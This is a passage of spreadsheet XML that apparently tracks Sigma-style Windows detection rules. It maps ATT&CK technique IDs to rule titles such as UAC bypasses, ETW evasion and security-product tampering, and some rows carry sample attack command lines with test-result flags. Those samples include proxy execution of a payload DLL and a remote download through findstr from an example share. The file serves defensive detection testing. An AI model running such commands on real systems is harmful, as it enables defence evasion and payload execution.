      <c r="I3406" s="44" t="n"/>
      <c r="J3406" s="44" t="n"/>
      <c r="K3406" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3407" ht="15.75" customHeight="1" s="42">
      <c r="A3407" s="44" t="inlineStr">
        <is>
          <t>t1562.006</t>
        </is>
      </c>
      <c r="B3407" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_etw_trace_evasion</t>
        </is>
      </c>
      <c r="C3407" s="44" t="inlineStr">
        <is>
          <t>ETW Trace Evasion Activity</t>
        </is>
      </c>
      <c r="D3407" s="44" t="inlineStr">
        <is>
          <t>a238b5d0-ce2d-4414-a676-7a531b3d13d6</t>
        </is>
      </c>
      <c r="E3407" s="44" t="n"/>
      <c r="F3407" s="44" t="n"/>
      <c r="G3407" s="44" t="n"/>
      <c r="H3407" s="44" t="n"/>
      <c r="I3407" s="44" t="n"/>
      <c r="J3407" s="44" t="n"/>
      <c r="K3407" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3408" ht="15.75" customHeight="1" s="42">
      <c r="A3408" s="44" t="n"/>
      <c r="B3408" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ms_appinstaller_download</t>
        </is>
      </c>
      <c r="C3408" s="44" t="inlineStr">
        <is>
          <t>Potential File Download Via MS-AppInstaller Protocol Handler</t>
        </is>
      </c>
      <c r="D3408" s="44" t="inlineStr">
        <is>
          <t>180c7c5c-d64b-4a63-86e9-68910451bc8b</t>
        </is>
      </c>
      <c r="E3408" s="44" t="n"/>
      <c r="F3408" s="44" t="n"/>
      <c r="G3408" s="44" t="n"/>
      <c r="H3408" s="44" t="n"/>
      <c r="I3408" s="44" t="n"/>
      <c r="J3408" s="44" t="n"/>
      <c r="K3408" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3409" ht="15.75" customHeight="1" s="42">
      <c r="A3409" s="44" t="n"/>
      <c r="B3409" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_non_priv_reg_or_ps</t>
        </is>
      </c>
      <c r="C3409" s="44" t="inlineStr">
        <is>
          <t>Non-privileged Usage of Reg or Powershell</t>
        </is>
      </c>
      <c r="D3409" s="44" t="inlineStr">
        <is>
          <t>8f02c935-effe-45b3-8fc9-ef8696a9e41d</t>
        </is>
      </c>
      <c r="E3409" s="44" t="n"/>
      <c r="F3409" s="44" t="n"/>
      <c r="G3409" s="44" t="n"/>
      <c r="H3409" s="44" t="n"/>
      <c r="I3409" s="44" t="n"/>
      <c r="J3409" s="44" t="n"/>
      <c r="K3409" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3410" ht="15.75" customHeight="1" s="42">
      <c r="A3410" s="44" t="n"/>
      <c r="B3410" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_nteventlogfile_usage</t>
        </is>
      </c>
      <c r="C3410" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Call To Win32_NTEventlogFile Class</t>
        </is>
      </c>
      <c r="D3410" s="44" t="inlineStr">
        <is>
          <t>caf201a9-c2ce-4a26-9c3a-2b9525413711</t>
        </is>
      </c>
      <c r="E3410" s="44" t="n"/>
      <c r="F3410" s="44" t="n"/>
      <c r="G3410" s="44" t="n"/>
      <c r="H3410" s="44" t="n"/>
      <c r="I3410" s="44" t="n"/>
      <c r="J3410" s="44" t="n"/>
      <c r="K3410" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3411" ht="15.75" customHeight="1" s="42">
      <c r="A3411" s="44" t="n"/>
      <c r="B3411" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ntfs_short_name_path_use_cli</t>
        </is>
      </c>
      <c r="C3411" s="44" t="inlineStr">
        <is>
          <t>Use Short Name Path in Command Line</t>
        </is>
      </c>
      <c r="D3411" s="44" t="inlineStr">
        <is>
          <t>349d891d-fef0-4fe4-bc53-eee623a15969</t>
        </is>
      </c>
      <c r="E3411" s="44" t="n"/>
      <c r="F3411" s="44" t="n"/>
      <c r="G3411" s="44" t="n"/>
      <c r="H3411" s="44" t="n"/>
      <c r="I3411" s="44" t="n"/>
      <c r="J3411" s="44" t="n"/>
      <c r="K3411" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3412" ht="15.75" customHeight="1" s="42">
      <c r="A3412" s="44" t="n"/>
      <c r="B3412" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ntfs_short_name_use_cli</t>
        </is>
      </c>
      <c r="C3412" s="44" t="inlineStr">
        <is>
          <t>Use NTFS Short Name in Command Line</t>
        </is>
      </c>
      <c r="D3412" s="44" t="inlineStr">
        <is>
          <t>dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795</t>
        </is>
      </c>
      <c r="E3412" s="44" t="n"/>
      <c r="F3412" s="44" t="n"/>
      <c r="G3412" s="44" t="n"/>
      <c r="H3412" s="44" t="n"/>
      <c r="I3412" s="44" t="n"/>
      <c r="J3412" s="44" t="n"/>
      <c r="K3412" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3413" ht="15.75" customHeight="1" s="42">
      <c r="A3413" s="44" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B3413" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_service_tamper</t>
        </is>
      </c>
      <c r="C3413" s="44" t="inlineStr">
        <is>
          <t>Suspicious Windows Service Tampering</t>
        </is>
      </c>
      <c r="D3413" s="44" t="inlineStr">
        <is>
          <t>ce72ef99-22f1-43d4-8695-419dcb5d9330</t>
        </is>
      </c>
      <c r="E3413" s="44" t="n"/>
      <c r="F3413" s="44" t="n"/>
      <c r="G3413" s="44" t="n"/>
      <c r="H3413" s="44" t="n"/>
      <c r="I3413" s="44" t="n"/>
      <c r="J3413" s="44" t="n"/>
      <c r="K3413" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3414" ht="15.75" customHeight="1" s="42">
      <c r="A3414" s="44" t="n"/>
      <c r="B3414" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_service_tamper</t>
        </is>
      </c>
      <c r="C3414" s="44" t="inlineStr">
        <is>
          <t>Suspicious Windows Service Tampering</t>
        </is>
      </c>
      <c r="D3414" s="44" t="inlineStr">
        <is>
          <t>ce72ef99-22f1-43d4-8695-419dcb5d9330</t>
        </is>
      </c>
      <c r="E3414" s="44" t="n"/>
      <c r="F3414" s="44" t="n"/>
      <c r="G3414" s="44" t="n"/>
      <c r="H3414" s="44" t="n"/>
      <c r="I3414" s="44" t="n"/>
      <c r="J3414" s="44" t="n"/>
      <c r="K3414" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3415" ht="15.75" customHeight="1" s="42">
      <c r="A3415" s="44" t="n"/>
      <c r="B3415" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_task_folder_evasion</t>
        </is>
      </c>
      <c r="C3415" s="44" t="inlineStr">
        <is>
          <t>Tasks Folder Evasion</t>
        </is>
      </c>
      <c r="D3415" s="44" t="inlineStr">
        <is>
          <t>cc4e02ba-9c06-48e2-b09e-2500cace9ae0</t>
        </is>
      </c>
      <c r="E3415" s="44" t="n"/>
      <c r="F3415" s="44" t="n"/>
      <c r="G3415" s="44" t="n"/>
      <c r="H3415" s="44" t="n"/>
      <c r="I3415" s="44" t="n"/>
      <c r="J3415" s="44" t="n"/>
      <c r="K3415" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3416" ht="15.75" customHeight="1" s="42">
      <c r="A3416" s="44" t="n"/>
      <c r="B3416" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_pssuspend_susp_execution</t>
        </is>
      </c>
      <c r="C3416" s="44" t="inlineStr">
        <is>
          <t>Sysinternals PsSuspend Suspicious Execution</t>
        </is>
      </c>
      <c r="D3416" s="44" t="inlineStr">
        <is>
          <t>4beb6ae0-f85b-41e2-8f18-8668abc8af78</t>
        </is>
      </c>
      <c r="E3416" s="44" t="n"/>
      <c r="F3416" s="44" t="n"/>
      <c r="G3416" s="44" t="n"/>
      <c r="H3416" s="44" t="n"/>
      <c r="I3416" s="44" t="n"/>
      <c r="J3416" s="44" t="n"/>
      <c r="K3416" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3417" ht="15.75" customHeight="1" s="42">
      <c r="A3417" s="44" t="n"/>
      <c r="B3417" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_systemsettingsadminflows_turn_on_dev_features</t>
        </is>
      </c>
      <c r="C3417" s="44" t="inlineStr">
        <is>
          <t>Potential Signing Bypass Via Windows Developer Features</t>
        </is>
      </c>
      <c r="D3417" s="44" t="inlineStr">
        <is>
          <t>a383dec4-deec-4e6e-913b-ed9249670848</t>
        </is>
      </c>
      <c r="E3417" s="44" t="n"/>
      <c r="F3417" s="44" t="n"/>
      <c r="G3417" s="44" t="n"/>
      <c r="H3417" s="44" t="n"/>
      <c r="I3417" s="44" t="n"/>
      <c r="J3417" s="44" t="n"/>
      <c r="K3417" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3418" ht="15.75" customHeight="1" s="42">
      <c r="A3418" s="44" t="n"/>
      <c r="B3418" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_taskkill_sep</t>
        </is>
      </c>
      <c r="C3418" s="44" t="inlineStr">
        <is>
          <t>Taskkill Symantec Endpoint Protection</t>
        </is>
      </c>
      <c r="D3418" s="44" t="inlineStr">
        <is>
          <t>4a6713f6-3331-11ed-a261-0242ac120002</t>
        </is>
      </c>
      <c r="E3418" s="44" t="n"/>
      <c r="F3418" s="44" t="n"/>
      <c r="G3418" s="44" t="n"/>
      <c r="H3418" s="44" t="n"/>
      <c r="I3418" s="44" t="n"/>
      <c r="J3418" s="44" t="n"/>
      <c r="K3418" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3419" ht="15.75" customHeight="1" s="42">
      <c r="A3419" s="44" t="n"/>
      <c r="B3419" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cleanmgr</t>
        </is>
      </c>
      <c r="C3419" s="44" t="inlineStr">
        <is>
          <t>UAC Bypass Using Disk Cleanup</t>
        </is>
      </c>
      <c r="D3419" s="44" t="inlineStr">
        <is>
          <t>b697e69c-746f-4a86-9f59-7bfff8eab881</t>
        </is>
      </c>
      <c r="E3419" s="44" t="n"/>
      <c r="F3419" s="44" t="n"/>
      <c r="G3419" s="44" t="n"/>
      <c r="H3419" s="44" t="n"/>
      <c r="I3419" s="44" t="n"/>
      <c r="J3419" s="44" t="n"/>
      <c r="K3419" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3420" ht="15.75" customHeight="1" s="42">
      <c r="A3420" s="44" t="n"/>
      <c r="B3420" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_eventvwr_recentviews</t>
        </is>
      </c>
      <c r="C3420" s="44" t="inlineStr">
        <is>
          <t>UAC Bypass Using Event Viewer RecentViews</t>
        </is>
      </c>
      <c r="D3420" s="44" t="inlineStr">
        <is>
          <t>30fc8de7-d833-40c4-96b6-28319fbc4f6c</t>
        </is>
      </c>
      <c r="E3420" s="44" t="n"/>
      <c r="F3420" s="44" t="n"/>
      <c r="G3420" s="44" t="n"/>
      <c r="H3420" s="44" t="n"/>
      <c r="I3420" s="44" t="n"/>
      <c r="J3420" s="44" t="n"/>
      <c r="K3420" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3421" ht="15.75" customHeight="1" s="42">
      <c r="A3421" s="44" t="n"/>
      <c r="B3421" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_msconfig_gui</t>
        </is>
      </c>
      <c r="C3421" s="44" t="inlineStr">
        <is>
          <t>UAC Bypass Using MSConfig Token Modification - Process</t>
        </is>
      </c>
      <c r="D3421" s="44" t="inlineStr">
        <is>
          <t>ad92e3f9-7eb6-460e-96b1-582b0ccbb980</t>
        </is>
      </c>
      <c r="E3421" s="44" t="n"/>
      <c r="F3421" s="44" t="n"/>
      <c r="G3421" s="44" t="n"/>
      <c r="H3421" s="44" t="n"/>
      <c r="I3421" s="44" t="n"/>
      <c r="J3421" s="44" t="n"/>
      <c r="K3421" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3422" ht="15.75" customHeight="1" s="42">
      <c r="A3422" s="44" t="n"/>
      <c r="B3422" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_ntfs_reparse_point</t>
        </is>
      </c>
      <c r="C3422" s="44" t="inlineStr">
        <is>
          <t>UAC Bypass Using NTFS Reparse Point - Process</t>
        </is>
      </c>
      <c r="D3422" s="44" t="inlineStr">
        <is>
          <t>39ed3c80-e6a1-431b-9df3-911ac53d08a7</t>
        </is>
      </c>
      <c r="E3422" s="44" t="n"/>
      <c r="F3422" s="44" t="n"/>
      <c r="G3422" s="44" t="n"/>
      <c r="H3422" s="44" t="n"/>
      <c r="I3422" s="44" t="n"/>
      <c r="J3422" s="44" t="n"/>
      <c r="K3422" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3423" ht="15.75" customHeight="1" s="42">
      <c r="A3423" s="44" t="n"/>
      <c r="B3423" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_virtualbox_vboxdrvinst_execution</t>
        </is>
      </c>
      <c r="C3423" s="44" t="inlineStr">
        <is>
          <t>Suspicious VBoxDrvInst.exe Parameters</t>
        </is>
      </c>
      <c r="D3423" s="44" t="inlineStr">
        <is>
          <t>b7b19cb6-9b32-4fc4-a108-73f19acfe262</t>
        </is>
      </c>
      <c r="E3423" s="44" t="n"/>
      <c r="F3423" s="44" t="n"/>
      <c r="G3423" s="44" t="n"/>
      <c r="H3423" s="44" t="n"/>
      <c r="I3423" s="44" t="n"/>
      <c r="J3423" s="44" t="n"/>
      <c r="K3423" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3424" ht="15.75" customHeight="1" s="42">
      <c r="A3424" s="44" t="n"/>
      <c r="B3424" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vsdiagnostics_execution_proxy</t>
        </is>
      </c>
      <c r="C3424" s="44" t="inlineStr">
        <is>
          <t>Potential Binary Proxy Execution Via VSDiagnostics.EXE</t>
        </is>
      </c>
      <c r="D3424" s="44" t="inlineStr">
        <is>
          <t>ac1c92b4-ac81-405a-9978-4604d78cc47e</t>
        </is>
      </c>
      <c r="E3424" s="44" t="n"/>
      <c r="F3424" s="44" t="n"/>
      <c r="G3424" s="44" t="n"/>
      <c r="H3424" s="44" t="n"/>
      <c r="I3424" s="44" t="n"/>
      <c r="J3424" s="44" t="n"/>
      <c r="K3424" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3425" ht="15.75" customHeight="1" s="42">
      <c r="A3425" s="44" t="n"/>
      <c r="B3425" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_werfaultsecure_process_freeze</t>
        </is>
      </c>
      <c r="C3425" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Suspension via WERFaultSecure through EDR-Freeze</t>
        </is>
      </c>
      <c r="D3425" s="44" t="inlineStr">
        <is>
          <t>1f0b4cac-9c81-41f4-95d0-8475ff46b3e2</t>
        </is>
      </c>
      <c r="E3425" s="44" t="n"/>
      <c r="F3425" s="44" t="n"/>
      <c r="G3425" s="44" t="n"/>
      <c r="H3425" s="44" t="n"/>
      <c r="I3425" s="44" t="n"/>
      <c r="J3425" s="44" t="n"/>
      <c r="K3425" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3426" ht="15.75" customHeight="1" s="42">
      <c r="A3426" s="44" t="n"/>
      <c r="B3426" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_local_install_via_manifest</t>
        </is>
      </c>
      <c r="C3426" s="44" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest</t>
        </is>
      </c>
      <c r="D3426" s="44" t="inlineStr">
        <is>
          <t>313d6012-51a0-4d93-8dfc-de8553239e25</t>
        </is>
      </c>
      <c r="E3426" s="44" t="n"/>
      <c r="F3426" s="44" t="n"/>
      <c r="G3426" s="44" t="n"/>
      <c r="H3426" s="44" t="n"/>
      <c r="I3426" s="44" t="n"/>
      <c r="J3426" s="44" t="n"/>
      <c r="K3426" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3427" ht="15.75" customHeight="1" s="42">
      <c r="A3427" s="44" t="n"/>
      <c r="B3427" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs</t>
        </is>
      </c>
      <c r="C3427" s="44" t="inlineStr">
        <is>
          <t>Remote Code Execute via Winrm.vbs</t>
        </is>
      </c>
      <c r="D3427" s="44" t="inlineStr">
        <is>
          <t>9df0dd3a-1a5c-47e3-a2bc-30ed177646a0</t>
        </is>
      </c>
      <c r="E3427" s="44" t="n"/>
      <c r="F3427" s="44" t="n"/>
      <c r="G3427" s="44" t="n"/>
      <c r="H3427" s="44" t="n"/>
      <c r="I3427" s="44" t="n"/>
      <c r="J3427" s="44" t="n"/>
      <c r="K3427" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3428" ht="15.75" customHeight="1" s="42">
      <c r="A3428" s="44" t="n"/>
      <c r="B3428" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_uninstall_security_products</t>
        </is>
      </c>
      <c r="C3428" s="44" t="inlineStr">
        <is>
          <t>Potential Tampering With Security Products Via WMIC</t>
        </is>
      </c>
      <c r="D3428" s="44" t="inlineStr">
        <is>
          <t>847d5ff3-8a31-4737-a970-aeae8fe21765</t>
        </is>
      </c>
      <c r="E3428" s="44" t="n"/>
      <c r="F3428" s="44" t="n"/>
      <c r="G3428" s="44" t="n"/>
      <c r="H3428" s="44" t="n"/>
      <c r="I3428" s="44" t="n"/>
      <c r="J3428" s="44" t="n"/>
      <c r="K3428" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3429" ht="15.75" customHeight="1" s="42">
      <c r="A3429" s="44" t="n"/>
      <c r="B3429" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_xsl_script_processing</t>
        </is>
      </c>
      <c r="C3429" s="44" t="inlineStr">
        <is>
          <t>XSL Script Execution Via WMIC.EXE</t>
        </is>
      </c>
      <c r="D3429" s="44" t="inlineStr">
        <is>
          <t>05c36dd6-79d6-4a9a-97da-3db20298ab2d</t>
        </is>
      </c>
      <c r="E3429" s="44" t="n"/>
      <c r="F3429" s="44" t="n"/>
      <c r="G3429" s="44" t="n"/>
      <c r="H3429" s="44" t="n"/>
      <c r="I3429" s="44" t="n"/>
      <c r="J3429" s="44" t="n"/>
      <c r="K3429" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3430" ht="15.75" customHeight="1" s="42">
      <c r="A3430" s="44" t="n"/>
      <c r="B3430" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmiprvse_susp_child_processes</t>
        </is>
      </c>
      <c r="C3430" s="44" t="inlineStr">
        <is>
          <t>Suspicious WmiPrvSE Child Process</t>
        </is>
      </c>
      <c r="D3430" s="44" t="inlineStr">
        <is>
          <t>8a582fe2-0882-4b89-a82a-da6b2dc32937</t>
        </is>
      </c>
      <c r="E3430" s="44" t="n"/>
      <c r="F3430" s="44" t="n"/>
      <c r="G3430" s="44" t="n"/>
      <c r="H3430" s="44" t="n"/>
      <c r="I3430" s="44" t="n"/>
      <c r="J3430" s="44" t="n"/>
      <c r="K3430" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3431" ht="15.75" customHeight="1" s="42">
      <c r="A3431" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3431" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_addinutil_suspicious_cmdline</t>
        </is>
      </c>
      <c r="C3431" s="44" t="inlineStr">
        <is>
          <t>Suspicious AddinUtil.EXE CommandLine Execution</t>
        </is>
      </c>
      <c r="D3431" s="44" t="inlineStr">
        <is>
          <t>631b22a4-70f4-4e2f-9ea8-42f84d9df6d8</t>
        </is>
      </c>
      <c r="E3431" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe /AddInRoot:C:\Users\Public\Addins</t>
        </is>
      </c>
      <c r="F3431" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3431" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3431" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3431" s="44" t="n"/>
      <c r="J3431" s="44" t="n"/>
      <c r="K3431" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3432" ht="15.75" customHeight="1" s="42">
      <c r="A3432" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3432" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_addinutil_suspicious_cmdline</t>
        </is>
      </c>
      <c r="C3432" s="44" t="inlineStr">
        <is>
          <t>Suspicious AddinUtil.EXE CommandLine Execution</t>
        </is>
      </c>
      <c r="D3432" s="44" t="inlineStr">
        <is>
          <t>631b22a4-70f4-4e2f-9ea8-42f84d9df6d8</t>
        </is>
      </c>
      <c r="E3432" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe "-AddInRoot":C:\Users\Public\Addins</t>
        </is>
      </c>
      <c r="F3432" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3432" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3432" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3432" s="44" t="n"/>
      <c r="J3432" s="44" t="n"/>
      <c r="K3432" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3433" ht="15.75" customHeight="1" s="42">
      <c r="A3433" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3433" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_addinutil_uncommon_cmdline</t>
        </is>
      </c>
      <c r="C3433" s="44" t="inlineStr">
        <is>
          <t>Uncommon AddinUtil.EXE CommandLine Execution</t>
        </is>
      </c>
      <c r="D3433" s="44" t="inlineStr">
        <is>
          <t>4f2cd9b6-4a17-440f-bb2a-687abb65993a</t>
        </is>
      </c>
      <c r="E3433" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe /AddInRoot:C:\Users\Public\Addins</t>
        </is>
      </c>
      <c r="F3433" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3433" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3433" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3433" s="44" t="n"/>
      <c r="J3433" s="44" t="n"/>
      <c r="K3433" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3434" ht="15.75" customHeight="1" s="42">
      <c r="A3434" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3434" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_addinutil_uncommon_cmdline</t>
        </is>
      </c>
      <c r="C3434" s="44" t="inlineStr">
        <is>
          <t>Uncommon AddinUtil.EXE CommandLine Execution</t>
        </is>
      </c>
      <c r="D3434" s="44" t="inlineStr">
        <is>
          <t>4f2cd9b6-4a17-440f-bb2a-687abb65993a</t>
        </is>
      </c>
      <c r="E3434" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe "-AddInRoot":C:\Users\Public\Addins</t>
        </is>
      </c>
      <c r="F3434" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3434" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3434" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3434" s="44" t="n"/>
      <c r="J3434" s="44" t="n"/>
      <c r="K3434" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3435" ht="15.75" customHeight="1" s="42">
      <c r="A3435" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3435" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dotnet_arbitrary_dll_csproj_execution</t>
        </is>
      </c>
      <c r="C3435" s="44" t="inlineStr">
        <is>
          <t>Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE</t>
        </is>
      </c>
      <c r="D3435" s="44" t="inlineStr">
        <is>
          <t>d80d5c81-04ba-45b4-84e4-92eba40e0ad3</t>
        </is>
      </c>
      <c r="E3435" s="44" t="inlineStr">
        <is>
          <t>dotnet.exe exec C:\Temp\payload.dll --param value</t>
        </is>
      </c>
      <c r="F3435" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3435" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3435" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3435" s="44" t="n"/>
      <c r="J3435" s="44" t="n"/>
      <c r="K3435" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3436" ht="15.75" customHeight="1" s="42">
      <c r="A3436" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3436" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dotnet_arbitrary_dll_csproj_execution</t>
        </is>
      </c>
      <c r="C3436" s="44" t="inlineStr">
        <is>
          <t>Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE</t>
        </is>
      </c>
      <c r="D3436" s="44" t="inlineStr">
        <is>
          <t>d80d5c81-04ba-45b4-84e4-92eba40e0ad3</t>
        </is>
      </c>
      <c r="E3436" s="44" t="inlineStr">
        <is>
          <t>dotnet.exe exec C:\Temp\payload.dll -h</t>
        </is>
      </c>
      <c r="F3436" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3436" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3436" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3436" s="44" t="n"/>
      <c r="J3436" s="44" t="n"/>
      <c r="K3436" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3437" ht="15.75" customHeight="1" s="42">
      <c r="A3437" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3437" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C3437" s="44" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D3437" s="44" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E3437" s="44" t="inlineStr">
        <is>
          <t>findstr.exe "-v" "-l" "TEST-HOST" \\example.com\share\test.txt</t>
        </is>
      </c>
      <c r="F3437" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3437" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3437" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3437" s="44" t="n"/>
      <c r="J3437" s="44" t="n"/>
      <c r="K3437" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3438" ht="15.75" customHeight="1" s="42">
      <c r="A3438" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3438" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C3438" s="44" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D3438" s="44" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E3438" s="44" t="inlineStr">
        <is>
          <t>findstr.exe	/v	/l	"TEST-HOST"	\\example.com\share\test.txt</t>
        </is>
      </c>
      <c r="F3438" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3438" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3438" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3438" s="44" t="n"/>
      <c r="J3438" s="44" t="n"/>
      <c r="K3438" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3439" ht="15.75" customHeight="1" s="42">
      <c r="A3439" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3439" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C3439" s="44" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D3439" s="44" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E3439" s="44" t="inlineStr">
        <is>
          <t>findstr.exe /vl "TEST-HOST" \\example.com\share\test.txt</t>
        </is>
      </c>
      <c r="F3439" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3439" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3439" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3439" s="44" t="n"/>
      <c r="J3439" s="44" t="n"/>
      <c r="K3439" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3440" ht="15.75" customHeight="1" s="42">
      <c r="A3440" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3440" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iexpress_susp_execution</t>
        </is>
      </c>
      <c r="C3440" s="44" t="inlineStr">
        <is>
          <t>Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location</t>
        </is>
      </c>
      <c r="D3440" s="44" t="inlineStr">
        <is>
